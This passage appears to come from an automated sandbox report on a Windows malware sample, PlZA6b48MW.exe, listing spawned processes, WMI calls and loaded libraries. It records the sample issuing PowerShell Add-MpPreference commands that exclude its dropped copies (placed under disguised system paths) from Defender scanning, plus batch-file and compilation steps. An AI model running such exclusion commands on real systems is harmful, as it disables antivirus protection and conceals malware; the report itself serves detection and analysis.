                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: PlZA6b48MW.exeReversingLabs: Detection: 73%
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile read: C:\Users\user\Desktop\PlZA6b48MW.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\PlZA6b48MW.exe "C:\Users\user\Desktop\PlZA6b48MW.exe"
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEC13.tmp" "c:\Windows\System32\CSC745280B6A8F34BD8AA304A2671FFBC0.TMP"
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe'
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\dllhost.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Application Data\WtHZilDMhVnOIkoIfPBLn.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PlZA6b48MW.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wA41hAKrBM.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Program Files\Windows Multimedia Platform\dllhost.exe "C:\Program Files\Windows Multimedia Platform\dllhost.exe"
                            Source: unknownProcess created: C:\Program Files\Windows Multimedia Platform\dllhost.exe "C:\Program Files\Windows Multimedia Platform\dllhost.exe"
                            Source: unknownProcess created: C:\Users\user\Desktop\PlZA6b48MW.exe C:\Users\user\Desktop\PlZA6b48MW.exe
                            Source: unknownProcess created: C:\Users\user\Desktop\PlZA6b48MW.exe C:\Users\user\Desktop\PlZA6b48MW.exe
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: unknownProcess created: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                            Source: unknownProcess created: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: unknownProcess created: C:\Users\user\Desktop\PlZA6b48MW.exe "C:\Users\user\Desktop\PlZA6b48MW.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\PlZA6b48MW.exe "C:\Users\user\Desktop\PlZA6b48MW.exe"
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat" "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bjcQ5hKx2L.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: unknownProcess created: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe "C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\PlZA6b48MW.exe "C:\Users\user\Desktop\PlZA6b48MW.exe"
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6jqn6DqxiC.bat" "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\dllhost.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Application Data\WtHZilDMhVnOIkoIfPBLn.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PlZA6b48MW.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wA41hAKrBM.bat" Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEC13.tmp" "c:\Windows\System32\CSC745280B6A8F34BD8AA304A2671FFBC0.TMP"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\PlZA6b48MW.exe "C:\Users\user\Desktop\PlZA6b48MW.exe"
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat" "
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bjcQ5hKx2L.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\PlZA6b48MW.exe "C:\Users\user\Desktop\PlZA6b48MW.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6jqn6DqxiC.bat" "
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
